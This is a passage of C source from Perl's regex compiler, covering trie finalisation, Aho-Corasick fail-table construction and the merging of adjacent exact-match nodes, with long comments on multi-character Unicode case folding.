pv_pretty(sv, SvPV_nolen_const(*tmp), SvCUR(*tmp), 6,
PL_colors[0], PL_colors[1],
(SvUTF8(*tmp) ? PERL_PV_ESCAPE_UNI : 0) |
PERL_PV_ESCAPE_FIRSTCHAR
)
);
});
if ( state==1 ) {
OP( convert ) = nodetype;
str=STRING(convert);
STR_LEN(convert)=0;
}
STR_LEN(convert) += len;
while (len--)
*str++ = *ch++;
} else {
#ifdef DEBUGGING
if (state>1)
DEBUG_OPTIMISE_r(Perl_re_printf( aTHX_ "]\n"));
#endif
break;
}
}
trie->prefixlen = (state-1);
if (str) {
regnode *n = convert+NODE_SZ_STR(convert);
NEXT_OFF(convert) = NODE_SZ_STR(convert);
trie->startstate = state;
trie->minlen -= (state - 1);
trie->maxlen -= (state - 1);
#ifdef DEBUGGING
/* At least the UNICOS C compiler choked on this
* being an argument to DEBUG_r(), so let's just have
* it right here. */
if (
#ifdef PERL_EXT_RE_BUILD
1
#else
DEBUG_r_TEST
#endif
) {
regnode *fix = convert;
U32 word = trie->wordcount;
#ifdef RE_TRACK_PATTERN_OFFSETS
mjd_nodelen++;
#endif
Set_Node_Offset_Length(convert, mjd_offset, state - 1);
while( ++fix < n ) {
Set_Node_Offset_Length(fix, 0, 0);
}
while (word--) {
SV ** const tmp = av_fetch( trie_words, word, 0 );
if (tmp) {
if ( STR_LEN(convert) <= SvCUR(*tmp) )
sv_chop(*tmp, SvPV_nolen(*tmp) + STR_LEN(convert));
else
sv_chop(*tmp, SvPV_nolen(*tmp) + SvCUR(*tmp));
}
}
}
#endif
if (trie->maxlen) {
convert = n;
} else {
NEXT_OFF(convert) = (U16)(tail - convert);
DEBUG_r(optimize= n);
}
}
}
if (!jumper)
jumper = last;
if ( trie->maxlen ) {
NEXT_OFF( convert ) = (U16)(tail - convert);
ARG_SET( convert, data_slot );
/* Store the offset to the first unabsorbed branch in
jump[0], which is otherwise unused by the jump logic.
We use this when dumping a trie and during optimisation. */
if (trie->jump)
trie->jump[0] = (U16)(nextbranch - convert);
/* If the start state is not accepting (meaning there is no empty string/NOTHING)
* and there is a bitmap
* and the first "jump target" node we found leaves enough room
* then convert the TRIE node into a TRIEC node, with the bitmap
* embedded inline in the opcode - this is hypothetically faster.
*/
if ( !trie->states[trie->startstate].wordnum
&& trie->bitmap
&& ( (char *)jumper - (char *)convert) >= (int)sizeof(struct regnode_charclass) )
{
OP( convert ) = TRIEC;
Copy(trie->bitmap, ((struct regnode_charclass *)convert)->bitmap, ANYOF_BITMAP_SIZE, char);
PerlMemShared_free(trie->bitmap);
trie->bitmap= NULL;
} else
OP( convert ) = TRIE;
/* store the type in the flags */
convert->flags = nodetype;
DEBUG_r({
optimize = convert
+ NODE_STEP_REGNODE
+ regarglen[ OP( convert ) ];
});
/* XXX We really should free up the resources in trie now,
as we won't use them - (which resources?) dmq */
}
/* needed for dumping */
DEBUG_r(if (optimize) {
regnode *opt = convert;
while ( ++opt < optimize) {
Set_Node_Offset_Length(opt, 0, 0);
}
/*
Try to clean up some of the debris left after the
optimisation.
*/
while( optimize < jumper ) {
Track_Code( mjd_nodelen += Node_Length((optimize)); );
OP( optimize ) = OPTIMIZED;
Set_Node_Offset_Length(optimize, 0, 0);
optimize++;
}
Set_Node_Offset_Length(convert, mjd_offset, mjd_nodelen);
});
} /* end node insert */
/* Finish populating the prev field of the wordinfo array. Walk back
* from each accept state until we find another accept state; if we find
* one, point the first word's .prev field at the second word. If the
* second already has a .prev field set, stop now. This will be the
* case either if we've already processed that word's accept state,
* or that state had multiple words, and the overspill words were
* already linked up earlier.
*/
{
U16 word;
U32 state;
U16 prev;
for (word=1; word <= trie->wordcount; word++) {
prev = 0;
if (trie->wordinfo[word].prev)
continue;
state = trie->wordinfo[word].accept;
while (state) {
state = prev_states[state];
if (!state)
break;
prev = trie->states[state].wordnum;
if (prev)
break;
}
trie->wordinfo[word].prev = prev;
}
Safefree(prev_states);
}
/* and now dump out the compressed format */
DEBUG_TRIE_COMPILE_r(dump_trie(trie, widecharmap, revcharmap, depth+1));
RExC_rxi->data->data[ data_slot + 1 ] = (void*)widecharmap;
#ifdef DEBUGGING
RExC_rxi->data->data[ data_slot + TRIE_WORDS_OFFSET ] = (void*)trie_words;
RExC_rxi->data->data[ data_slot + 3 ] = (void*)revcharmap;
#else
SvREFCNT_dec_NN(revcharmap);
#endif
return trie->jump
? MADE_JUMP_TRIE
: trie->startstate>1
? MADE_EXACT_TRIE
: MADE_TRIE;
}
STATIC regnode *
S_construct_ahocorasick_from_trie(pTHX_ RExC_state_t *pRExC_state, regnode *source, U32 depth)
{
/* The Trie is constructed and compressed now, so we can build a fail array if
* it's needed.
This is basically the Aho-Corasick algorithm. It's from exercises 3.31 and
3.32 in the
"Red Dragon" -- Compilers, principles, techniques, and tools. Aho, Sethi,
Ullman 1985/88
ISBN 0-201-10088-6
We find the fail state for each state in the trie; this state is the longest
proper suffix of the current state's 'word' that is also a proper prefix of
another word in our trie. State 1 represents the word '' and is thus the
default fail state. This allows the DFA not to have to restart after it has
tried and failed a word at a given point; it simply continues as though it
had been matching the other word in the first place.
Consider
'abcdgu'=~/abcdefg|cdgu/
When we get to 'd' we are still matching the first word, we would encounter
'g' which would fail, which would bring us to the state representing 'd' in
the second word where we would try 'g' and succeed, proceeding to match
'cdgu'.
*/
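/* A small illustration of the fail links computed below (sketch only):
* for /abcdefg|cdgu/ the trie state reached after reading "abcd" gets a
* fail link to the state reached after reading "cd", because "cd" is the
* longest proper suffix of "abcd" that is also a prefix of another word.
* So when 'e' is expected but 'g' is seen, we follow the fail link and the
* 'g' of "cdgu" can be tried without rescanning the input. */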
/* add a fail transition */
const U32 trie_offset = ARG(source);
reg_trie_data *trie=(reg_trie_data *)RExC_rxi->data->data[trie_offset];
U32 *q;
const U32 ucharcount = trie->uniquecharcount;
const U32 numstates = trie->statecount;
const U32 ubound = trie->lasttrans + ucharcount;
U32 q_read = 0;
U32 q_write = 0;
U32 charid;
U32 base = trie->states[ 1 ].trans.base;
U32 *fail;
reg_ac_data *aho;
const U32 data_slot = add_data( pRExC_state, STR_WITH_LEN("T"));
regnode *stclass;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_CONSTRUCT_AHOCORASICK_FROM_TRIE;
PERL_UNUSED_CONTEXT;
#ifndef DEBUGGING
PERL_UNUSED_ARG(depth);
#endif
if ( OP(source) == TRIE ) {
struct regnode_1 *op = (struct regnode_1 *)
PerlMemShared_calloc(1, sizeof(struct regnode_1));
StructCopy(source, op, struct regnode_1);
stclass = (regnode *)op;
} else {
struct regnode_charclass *op = (struct regnode_charclass *)
PerlMemShared_calloc(1, sizeof(struct regnode_charclass));
StructCopy(source, op, struct regnode_charclass);
stclass = (regnode *)op;
}
OP(stclass)+=2; /* convert the TRIE type to its AHO-CORASICK equivalent */
ARG_SET( stclass, data_slot );
aho = (reg_ac_data *) PerlMemShared_calloc( 1, sizeof(reg_ac_data) );
RExC_rxi->data->data[ data_slot ] = (void*)aho;
aho->trie=trie_offset;
aho->states=(reg_trie_state *)PerlMemShared_malloc( numstates * sizeof(reg_trie_state) );
Copy( trie->states, aho->states, numstates, reg_trie_state );
Newx( q, numstates, U32);
aho->fail = (U32 *) PerlMemShared_calloc( numstates, sizeof(U32) );
aho->refcount = 1;
fail = aho->fail;
/* initialize fail[0..1] to be 1 so that we always have
a valid final fail state */
fail[ 0 ] = fail[ 1 ] = 1;
for ( charid = 0; charid < ucharcount ; charid++ ) {
const U32 newstate = TRIE_TRANS_STATE( 1, base, ucharcount, charid, 0 );
if ( newstate ) {
q[ q_write ] = newstate;
/* set to point at the root */
fail[ q[ q_write++ ] ]=1;
}
}
while ( q_read < q_write) {
const U32 cur = q[ q_read++ % numstates ];
base = trie->states[ cur ].trans.base;
for ( charid = 0 ; charid < ucharcount ; charid++ ) {
const U32 ch_state = TRIE_TRANS_STATE( cur, base, ucharcount, charid, 1 );
if (ch_state) {
U32 fail_state = cur;
U32 fail_base;
do {
fail_state = fail[ fail_state ];
fail_base = aho->states[ fail_state ].trans.base;
} while ( !TRIE_TRANS_STATE( fail_state, fail_base, ucharcount, charid, 1 ) );
fail_state = TRIE_TRANS_STATE( fail_state, fail_base, ucharcount, charid, 1 );
fail[ ch_state ] = fail_state;
if ( !aho->states[ ch_state ].wordnum && aho->states[ fail_state ].wordnum )
{
aho->states[ ch_state ].wordnum = aho->states[ fail_state ].wordnum;
}
q[ q_write++ % numstates] = ch_state;
}
}
}
/* restore fail[0..1] to 0 so that we "fall out" of the AC loop
when we fail in state 1; this allows us to use the
charclass scan to find a valid start char. This is based on the principle
that there's a good chance the string being searched contains lots of stuff
that can't be a start char.
*/
fail[ 0 ] = fail[ 1 ] = 0;
DEBUG_TRIE_COMPILE_r({
Perl_re_indentf( aTHX_ "Stclass Failtable (%" UVuf " states): 0",
depth, (UV)numstates
);
for( q_read=1; q_read<numstates; q_read++ ) {
Perl_re_printf( aTHX_ ", %" UVuf, (UV)fail[q_read]);
}
Perl_re_printf( aTHX_ "\n");
});
Safefree(q);
/*RExC_seen |= REG_TRIEDFA_SEEN;*/
return stclass;
}
/* The below joins as many adjacent EXACTish nodes as possible into a single
* one. The regop may be changed if the node(s) contain certain sequences that
* require special handling. The joining is only done if:
* 1) there is room in the current conglomerated node to entirely contain the
* next one.
* 2) they are compatible node types
*
* The adjacent nodes actually may be separated by NOTHING-kind nodes, and
* these get optimized out
*
* XXX khw thinks this should be enhanced to fill EXACT (at least) nodes as full
* as possible, even if that means splitting an existing node so that its first
* part is moved to the preceding node. This would maximise the efficiency of
* memEQ during matching.
*
* If a node is to match under /i (folded), the number of characters it matches
* can be different from its character length if it contains a multi-character
* fold. *min_subtract is set to the total delta number of characters of the
* input nodes.
*
* And *unfolded_multi_char is set to indicate whether or not the node contains
* an unfolded multi-char fold. This happens when it won't be known until
* runtime whether the fold is valid or not; namely
* 1) for EXACTF nodes that contain LATIN SMALL LETTER SHARP S, as only if the
* target string being matched against turns out to be UTF-8 is that fold
* valid; or
* 2) for EXACTFL nodes whose folding rules depend on the locale in force at
* runtime.
* (Multi-char folds whose components are all above the Latin1 range are not
* run-time locale dependent, and have already been folded by the time this
* function is called.)
*
* This is as good a place as any to discuss the design of handling these
* multi-character fold sequences. It's been wrong in Perl for a very long
* time. There are three code points in Unicode whose multi-character folds
* were long ago discovered to mess things up. The previous designs for
* dealing with these involved assigning a special node for them. This
* approach doesn't always work, as evidenced by this example:
* "\xDFs" =~ /s\xDF/ui # Used to fail before these patches
* Both sides fold to "sss", but if the pattern is parsed to create a node that
* would match just the \xDF, it won't be able to handle the case where a
* successful match would have to cross the node's boundary. The new approach
* that hopefully generally solves the problem generates an EXACTFUP node
* that is "sss" in this case.
*
* It turns out that there are problems with all multi-character folds, and not
* just these three. Now the code is general, for all such cases. The
* approach taken is:
* 1) This routine examines each EXACTFish node that could contain multi-
* character folded sequences. Since a single character can fold into
* such a sequence, the minimum match length for this node is less than
* the number of characters in the node. This routine returns in
* *min_subtract how many characters to subtract from the actual
* length of the string to get a real minimum match length; it is 0 if
* there are no multi-char folds. This delta is used by the caller to
* adjust the min length of the match, and the delta between min and max,
* so that the optimizer doesn't reject these possibilities based on size
* constraints.
*
* 2) For the sequence involving the LATIN SMALL LETTER SHARP S (U+00DF)
* under /u, we fold it to 'ss' in regatom(), and in this routine, after
* joining, we scan for occurrences of the sequence 'ss' in non-UTF-8
* EXACTFU nodes. The node type of such nodes is then changed to
* EXACTFUP, indicating it is problematic, and needs careful handling.
* (The procedures in step 1) above are sufficient to handle this case in
* UTF-8 encoded nodes.) The reason this is problematic is that this is
* the only case where there is a possible fold length change in non-UTF-8
* patterns. By reserving a special node type for problematic cases, the
* far more common regular EXACTFU nodes can be processed faster.
* regexec.c takes advantage of this.
*
* EXACTFUP has been created as a grab-bag for (hopefully uncommon)
* problematic cases. These all only occur when the pattern is not
* UTF-8. In addition to the 'ss' sequence where there is a possible fold
* length change, it handles the situation where the string cannot be
* entirely folded. The strings in an EXACTFish node are folded as much
* as possible during compilation in regcomp.c. This saves effort in
* regex matching. By using an EXACTFUP node when it is not possible to
* fully fold at compile time, regexec.c can know that everything in an
* EXACTFU node is folded, so folding can be skipped at runtime. The only
* case where folding in EXACTFU nodes can't be done at compile time is
* the presumably uncommon MICRO SIGN, when the pattern isn't UTF-8. This
* is because its fold requires UTF-8 to represent. Thus EXACTFUP nodes
* handle two very different cases. Alternatively, there could have been
* a node type where there are length changes, one for unfolded, and one
* for both. If yet another special case needed to be created, the number
* of required node types would have to go to 7. khw figures that even
* though there are plenty of node types to spare, the maintenance
* cost wasn't worth the small speedup of doing it that way, especially
* since he thinks the MICRO SIGN is rarely encountered in practice.
*
* There are other cases where folding isn't done at compile time, but
* none of them are under /u, and hence not for EXACTFU nodes. The folds
* in EXACTFL nodes aren't known until runtime, and vary as the locale
* changes. Some folds in EXACTF depend on if the runtime target string
* is UTF-8 or not. (regatom() will create an EXACTFU node even under /di
* when no fold in it depends on the UTF-8ness of the target string.)
*
* 3) A problem remains for unfolded multi-char folds. (These occur when the
* validity of the fold won't be known until runtime, and so must remain
* unfolded for now. This happens for the sharp s in EXACTF and EXACTFAA
* nodes when the pattern isn't in UTF-8. (Note, BTW, that there cannot
* be an EXACTF node with a UTF-8 pattern.) They also occur for various
* folds in EXACTFL nodes, regardless of the UTF-ness of the pattern.)
* The reason this is a problem is that the optimizer part of regexec.c
* (probably unwittingly, in Perl_regexec_flags()) makes an assumption
* that a character in the pattern corresponds to at most a single
* character in the target string. (And I do mean character, and not byte
* here, unlike other parts of the documentation that have never been
* updated to account for multibyte Unicode.) Sharp s in EXACTF and
* EXACTFL nodes can match the two character string 'ss'; in EXACTFAA
* nodes it can match "\x{17F}\x{17F}". These, along with other ones in
* EXACTFL nodes, violate the assumption, and they are the only instances
* where it is violated. I'm reluctant to try to change the assumption,
* as the code involved is impenetrable to me (khw), so instead the code
* here punts. This routine examines EXACTFL nodes, and (when the pattern
* isn't UTF-8) EXACTF and EXACTFAA for such unfolded folds, and returns a
* boolean indicating whether or not the node contains such a fold. When
* it is true, the caller sets a flag that later causes the optimizer in
* this file to not set values for the floating and fixed string lengths,
* and thus avoids the optimizer code in regexec.c that makes the invalid
* assumption. Thus, there is no optimization based on string lengths for
* EXACTFL nodes that contain these few folds, nor for non-UTF8-pattern
* EXACTF and EXACTFAA nodes that contain the sharp s. (The reason the
* assumption is wrong only in these cases is that all other non-UTF-8
* folds are 1-1; and, for UTF-8 patterns, we pre-fold all other folds to
* their expanded versions. (Again, we can't prefold sharp s to 'ss' in
* EXACTF nodes because we don't know at compile time if it actually
* matches 'ss' or not. For EXACTF nodes it will match iff the target
* string is in UTF-8. This is in contrast to EXACTFU nodes, where it
* always matches; and EXACTFAA where it never does. In an EXACTFAA node
* in a UTF-8 pattern, sharp s is folded to "\x{17F}\x{17F}", avoiding the
* problem; but in a non-UTF8 pattern, folding it to that above-Latin1
* string would require the pattern to be forced into UTF-8, the overhead
* of which we want to avoid. Similarly the unfolded multi-char folds in
* EXACTFL nodes will match iff the locale at the time of match is a UTF-8
* locale.)
*
* Similarly, the code that generates tries doesn't currently handle
* not-already-folded multi-char folds, and it looks like a pain to change
* that. Therefore, trie generation of EXACTFAA nodes with the sharp s
* doesn't work. Instead, such an EXACTFAA is turned into a new regnode,
* EXACTFAA_NO_TRIE, which the trie code knows not to handle. Most people
* using /iaa matching will be doing so almost entirely with ASCII
* strings, so this should rarely be encountered in practice */
#define JOIN_EXACT(scan,min_subtract,unfolded_multi_char, flags) \
if (PL_regkind[OP(scan)] == EXACT) \
join_exact(pRExC_state,(scan),(min_subtract),unfolded_multi_char, (flags), NULL, depth+1)
STATIC U32
S_join_exact(pTHX_ RExC_state_t *pRExC_state, regnode *scan,
UV *min_subtract, bool *unfolded_multi_char,
U32 flags, regnode *val, U32 depth)
{
/* Merge several consecutive EXACTish nodes into one. */
regnode *n = regnext(scan);
U32 stringok = 1;
regnode *next = scan + NODE_SZ_STR(scan);
U32 merged = 0;
U32 stopnow = 0;
#ifdef DEBUGGING
regnode *stop = scan;
GET_RE_DEBUG_FLAGS_DECL;
#else
PERL_UNUSED_ARG(depth);
#endif
PERL_ARGS_ASSERT_JOIN_EXACT;
#ifndef EXPERIMENTAL_INPLACESCAN
PERL_UNUSED_ARG(flags);
PERL_UNUSED_ARG(val);
#endif
DEBUG_PEEP("join", scan, depth, 0);
assert(PL_regkind[OP(scan)] == EXACT);
/* Look through the subsequent nodes in the chain. Skip NOTHING, merge
* EXACT ones that are mergeable to the current one. */
while ( n
&& ( PL_regkind[OP(n)] == NOTHING
|| (stringok && PL_regkind[OP(n)] == EXACT))
&& NEXT_OFF(n)
&& NEXT_OFF(scan) + NEXT_OFF(n) < I16_MAX)
{
if (OP(n) == TAIL || n > next)
stringok = 0;
if (PL_regkind[OP(n)] == NOTHING) {
DEBUG_PEEP("skip:", n, depth, 0);
NEXT_OFF(scan) += NEXT_OFF(n);
next = n + NODE_STEP_REGNODE;
#ifdef DEBUGGING
if (stringok)
stop = n;
#endif
n = regnext(n);
}
else if (stringok) {
const unsigned int oldl = STR_LEN(scan);
regnode * const nnext = regnext(n);
/* XXX I (khw) kind of doubt that this works on platforms (should
* Perl ever run on one) where U8_MAX is above 255 because of lots
* of other assumptions */
/* Don't join if the sum can't fit into a single node */
if (oldl + STR_LEN(n) > U8_MAX)
break;
/* Joining something that requires UTF-8 with something that
* doesn't, means the result requires UTF-8. */
if (OP(scan) == EXACT && (OP(n) == EXACT_ONLY8)) {
OP(scan) = EXACT_ONLY8;
}
else if (OP(scan) == EXACT_ONLY8 && (OP(n) == EXACT)) {
; /* join is compatible, no need to change OP */
}
else if ((OP(scan) == EXACTFU) && (OP(n) == EXACTFU_ONLY8)) {
OP(scan) = EXACTFU_ONLY8;
}
else if ((OP(scan) == EXACTFU_ONLY8) && (OP(n) == EXACTFU)) {
; /* join is compatible, no need to change OP */
}
else if (OP(scan) == EXACTFU && OP(n) == EXACTFU) {
; /* join is compatible, no need to change OP */
}
else if (OP(scan) == EXACTFU && OP(n) == EXACTFU_S_EDGE) {
/* Under /di, temporary EXACTFU_S_EDGE nodes are generated,
* which can join with EXACTFU ones. We check for this case
* here. These need to be resolved to either EXACTFU or
* EXACTF at joining time. They have nothing in them that
* would forbid them from being the more desirable EXACTFU
* nodes except that they begin and/or end with a single [Ss].
* The reason this is problematic is because they could be
* joined in this loop with an adjacent node that ends and/or
* begins with [Ss] which would then form the sequence 'ss',
* which matches differently under /di than /ui, in which case
* EXACTFU can't be used. If the 'ss' sequence doesn't get
* formed, the nodes get absorbed into any adjacent EXACTFU
* node. And if the only adjacent node is EXACTF, they get
* absorbed into that, under the theory that a longer node is
* better than two shorter ones, even if one is EXACTFU. Note
* that EXACTFU_ONLY8 is generated only for UTF-8 patterns,
* and the EXACTFU_S_EDGE ones only for non-UTF-8. */
if (STRING(n)[STR_LEN(n)-1] == 's') {
/* Here the joined node would end with 's'. If the node
* following the combination is an EXACTF one, it's better to
* join this trailing edge 's' node with that one, leaving the
* current one in 'scan' as the more desirable EXACTFU */
if (OP(nnext) == EXACTF) {
break;
}
OP(scan) = EXACTFU_S_EDGE;
} /* Otherwise, the beginning 's' of the 2nd node just
becomes an interior 's' in 'scan' */
}
else if (OP(scan) == EXACTF && OP(n) == EXACTF) {
; /* join is compatible, no need to change OP */
}
else if (OP(scan) == EXACTF && OP(n) == EXACTFU_S_EDGE) {
/* EXACTF nodes are compatible for joining with EXACTFU_S_EDGE
* nodes. But the latter nodes can be also joined with EXACTFU
* ones, and that is a better outcome, so if the node following
* 'n' is EXACTFU, quit now so that those two can be joined
* later */
if (OP(nnext) == EXACTFU) {
break;
}
/* The join is compatible, and the combined node will be
* EXACTF. (These don't care if they begin or end with 's'.) */
}
else if (OP(scan) == EXACTFU_S_EDGE && OP(n) == EXACTFU_S_EDGE) {
if ( STRING(scan)[STR_LEN(scan)-1] == 's'
&& STRING(n)[0] == 's')
{
/* When combined, we have the sequence 'ss', which means we
* have to remain /di */
OP(scan) = EXACTF;
}
}
else if (OP(scan) == EXACTFU_S_EDGE && OP(n) == EXACTFU) {
if (STRING(n)[0] == 's') {
; /* Here the join is compatible and the combined node
starts with 's', no need to change OP */
}
else { /* Now the trailing 's' is in the interior */
OP(scan) = EXACTFU;
}
}
else if (OP(scan) == EXACTFU_S_EDGE && OP(n) == EXACTF) {
/* The join is compatible, and the combined node will be
* EXACTF. (These don't care if they begin or end with 's'.) */
OP(scan) = EXACTF;
}
else if (OP(scan) != OP(n)) {
/* The only other compatible joinings are the same node type */
break;
}
DEBUG_PEEP("merg", n, depth, 0);
merged++;
NEXT_OFF(scan) += NEXT_OFF(n);
STR_LEN(scan) += STR_LEN(n);
next = n + NODE_SZ_STR(n);
/* Now we can overwrite *n : */
Move(STRING(n), STRING(scan) + oldl, STR_LEN(n), char);
#ifdef DEBUGGING
stop = next - 1;
#endif
n = nnext;
if (stopnow) break;
}
#ifdef EXPERIMENTAL_INPLACESCAN
if (flags && !NEXT_OFF(n)) {
DEBUG_PEEP("atch", val, depth, 0);
if (reg_off_by_arg[OP(n)]) {
ARG_SET(n, val - n);
}
else {
NEXT_OFF(n) = val - n;
}
stopnow = 1;
}
#endif
}
/* This temporary node can now be turned into EXACTFU, and must be, as
* regexec.c doesn't handle it */
if (OP(scan) == EXACTFU_S_EDGE) {
OP(scan) = EXACTFU;
}
*min_subtract = 0;
*unfolded_multi_char = FALSE;
/* Here, all the adjacent mergeable EXACTish nodes have been merged. We
* can now analyze for sequences of problematic code points. (Prior to
* this final joining, sequences could have been split over boundaries, and
* hence missed.) The sequences only happen in folding, hence only in
* non-EXACT EXACTish nodes */
if (OP(scan) != EXACT && OP(scan) != EXACT_ONLY8 && OP(scan) != EXACTL) {
U8* s0 = (U8*) STRING(scan);
U8* s = s0;
U8* s_end = s0 + STR_LEN(scan);
int total_count_delta = 0; /* Total delta number of characters that
multi-char folds expand to */
/* One pass is made over the node's string looking for all the
* possibilities. To avoid some tests in the loop, there are two main
* cases, for UTF-8 patterns (which can't have EXACTF nodes) and
* non-UTF-8 */
if (UTF) {
U8* folded = NULL;
if (OP(scan) == EXACTFL) {
U8 *d;
/* An EXACTFL node would already have been changed to another
* node type unless there is at least one character in it that
* is problematic; likely a character whose fold definition
* won't be known until runtime, and so has yet to be folded.
* For all but the UTF-8 locale, folds are 1-1 in length, but
* to handle the UTF-8 case, we need to create a temporary
* folded copy using UTF-8 locale rules in order to analyze it.
* This is because our macros that look to see if a sequence is
* a multi-char fold assume everything is folded (otherwise the
* tests in those macros would be too complicated and slow).
* Note that here, the non-problematic folds will have already
* been done, so we can just copy such characters. We actually
* don't completely fold the EXACTFL string. We skip the
* unfolded multi-char folds, as that would just create work
* below to figure out the size they already are */
Newx(folded, UTF8_MAX_FOLD_CHAR_EXPAND * STR_LEN(scan) + 1, U8);
d = folded;
while (s < s_end) {
STRLEN s_len = UTF8SKIP(s);
if (! is_PROBLEMATIC_LOCALE_FOLD_utf8(s)) {
Copy(s, d, s_len, U8);
d += s_len;
}
else if (is_FOLDS_TO_MULTI_utf8(s)) {
*unfolded_multi_char = TRUE;
Copy(s, d, s_len, U8);
d += s_len;
}
else if (isASCII(*s)) {
*(d++) = toFOLD(*s);
}
else {
STRLEN len;
_toFOLD_utf8_flags(s, s_end, d, &len, FOLD_FLAGS_FULL);
d += len;
}
s += s_len;
}
/* Point the remainder of the routine to look at our temporary
* folded copy */
s = folded;
s_end = d;
} /* End of creating folded copy of EXACTFL string */
/* Examine the string for a multi-character fold sequence. UTF-8
* patterns have all characters pre-folded by the time this code is
* executed */
while (s < s_end - 1) /* Can stop 1 before the end, as minimum
length sequence we are looking for is 2 */
{
int count = 0; /* How many characters in a multi-char fold */
int len = is_MULTI_CHAR_FOLD_utf8_safe(s, s_end);
if (! len) { /* Not a multi-char fold: get next char */
s += UTF8SKIP(s);
continue;
}
{ /* Here is a generic multi-char fold. */
U8* multi_end = s + len;
/* Count how many characters are in it. In the case of
* /aa, no folds which contain ASCII code points are
* allowed, so check for those, and skip if found. */
if (OP(scan) != EXACTFAA && OP(scan) != EXACTFAA_NO_TRIE) {
count = utf8_length(s, multi_end);
s = multi_end;
}
else {
while (s < multi_end) {
if (isASCII(*s)) {
s++;
goto next_iteration;
}
else {
s += UTF8SKIP(s);
}
count++;
}
}
}
/* The delta is how long the sequence is minus 1 (1 is how long
* the character that folds to the sequence is) */
total_count_delta += count - 1;
next_iteration: ;
}
/* We created a temporary folded copy of the string in EXACTFL
* nodes. Therefore we need to be sure the adjusted length doesn't go below zero,
* as the real string could be shorter */
if (OP(scan) == EXACTFL) {
int total_chars = utf8_length((U8*) STRING(scan),
(U8*) STRING(scan) + STR_LEN(scan));
if (total_count_delta > total_chars) {
total_count_delta = total_chars;
}
}
*min_subtract += total_count_delta;
Safefree(folded);
}
else if (OP(scan) == EXACTFAA) {
/* Non-UTF-8 pattern, EXACTFAA node. There can't be a multi-char
* fold to the ASCII range (and there are no existing ones in the
* upper latin1 range). But, as outlined in the comments preceding
* this function, we need to flag any occurrences of the sharp s.
* This character forbids trie formation (because of added
* complexity) */
#if UNICODE_MAJOR_VERSION > 3 /* no multifolds in early Unicode */ \
|| (UNICODE_MAJOR_VERSION == 3 && ( UNICODE_DOT_VERSION > 0) \
|| UNICODE_DOT_DOT_VERSION > 0)
while (s < s_end) {
if (*s == LATIN_SMALL_LETTER_SHARP_S) {
OP(scan) = EXACTFAA_NO_TRIE;
*unfolded_multi_char = TRUE;
break;
}
s++;
}
}
else {
/* Non-UTF-8 pattern, not EXACTFAA node. Look for the multi-char
* folds that are all Latin1. As explained in the comments
* preceding this function, we look also for the sharp s in EXACTF
* and EXACTFL nodes; it can be in the final position. Otherwise
* we can stop looking 1 byte earlier because we have to find at least
* two characters for a multi-fold */
const U8* upper = (OP(scan) == EXACTF || OP(scan) == EXACTFL)
? s_end
: s_end -1;
while (s < upper) {
int len = is_MULTI_CHAR_FOLD_latin1_safe(s, s_end);
if (! len) { /* Not a multi-char fold. */
if (*s == LATIN_SMALL_LETTER_SHARP_S
&& (OP(scan) == EXACTF || OP(scan) == EXACTFL))
{
*unfolded_multi_char = TRUE;
}
s++;
continue;
}
if (len == 2
&& isALPHA_FOLD_EQ(*s, 's')
&& isALPHA_FOLD_EQ(*(s+1), 's'))
{
/* EXACTF nodes need to know that the minimum length
* changed so that a sharp s in the string can match this
* ss in the pattern, but they remain EXACTF nodes, as they
* won't match this unless the target string is UTF-8,
* which we don't know until runtime. EXACTFL nodes can't
* transform into EXACTFU nodes */
if (OP(scan) != EXACTF && OP(scan) != EXACTFL) {
OP(scan) = EXACTFUP;
}
}
*min_subtract += len - 1;
s += len;
}
#endif
}
if ( STR_LEN(scan) == 1
&& isALPHA_A(* STRING(scan))
&& ( OP(scan) == EXACTFAA
|| ( OP(scan) == EXACTFU
&& ! HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(* STRING(scan)))))
{
U8 mask = ~ ('A' ^ 'a'); /* These differ in just one bit */
/* Replace a length 1 ASCII fold pair node with an ANYOFM node,
* with the mask set to the complement of the bit that differs
* between upper and lower case, and the lowest code point of the
* pair (which the '&' forces) */
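/* Worked numbers (sketch): 'A' ^ 'a' == 0x20, so mask == 0xDF. For a node
* holding 'k' (0x6B), ARG becomes 0x6B & 0xDF == 0x4B ('K') and FLAGS
* becomes 0xDF; the intent is that a target byte b matches exactly when
* (b & 0xDF) == 0x4B, which holds only for 'K' and 'k'. */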
OP(scan) = ANYOFM;
ARG_SET(scan, *STRING(scan) & mask);
FLAGS(scan) = mask;
}
}
#ifdef DEBUGGING
/* Allow dumping, but overwrite the collection of skipped
* ops and/or strings with fake optimized ops */
n = scan + NODE_SZ_STR(scan);
while (n <= stop) {
OP(n) = OPTIMIZED;
FLAGS(n) = 0;
NEXT_OFF(n) = 0;
n++;
}
#endif
DEBUG_OPTIMISE_r(if (merged){DEBUG_PEEP("finl", scan, depth, 0);});
return stopnow;
}
/* REx optimizer. Converts nodes into quicker variants "in place".
Finds fixed substrings. */
/* Stops at toplevel WHILEM as well as at "last". At end *scanp is set
to the position after last scanned or to NULL. */
#define INIT_AND_WITHP \
assert(!and_withp); \
Newx(and_withp, 1, regnode_ssc); \
SAVEFREEPV(and_withp)
static void
S_unwind_scan_frames(pTHX_ const void *p)
{
scan_frame *f= (scan_frame *)p;
do {
scan_frame *n= f->next_frame;
Safefree(f);
f= n;
} while (f);
}
/* Follow the next-chain of the current node and optimize away
all the NOTHINGs from it.
*/
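/* Sketch of the effect (made-up offsets): if node A has NEXT_OFF 4 pointing
* at a NOTHING whose NEXT_OFF is 2, which in turn points at a NOTHING whose
* NEXT_OFF is 3 before reaching node B, then after this routine A's
* NEXT_OFF is 4 + 2 + 3 = 9 and A points directly at B. */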
STATIC void
S_rck_elide_nothing(pTHX_ regnode *node)
{
dVAR;
PERL_ARGS_ASSERT_RCK_ELIDE_NOTHING;
if (OP(node) != CURLYX) {
const int max = (reg_off_by_arg[OP(node)]
? I32_MAX
/* I32 may be smaller than U16 on CRAYs! */
: (I32_MAX < U16_MAX ? I32_MAX : U16_MAX));
int off = (reg_off_by_arg[OP(node)] ? ARG(node) : NEXT_OFF(node));
int noff;
regnode *n = node;
/* Skip NOTHING and LONGJMP. */
while (
(n = regnext(n))
&& (
(PL_regkind[OP(n)] == NOTHING && (noff = NEXT_OFF(n)))
|| ((OP(n) == LONGJMP) && (noff = ARG(n)))
)
&& off + noff < max
) {
off += noff;
}
if (reg_off_by_arg[OP(node)])
ARG(node) = off;
else
NEXT_OFF(node) = off;
}
return;
}
/* the return from this sub is the minimum length that could possibly match */
STATIC SSize_t
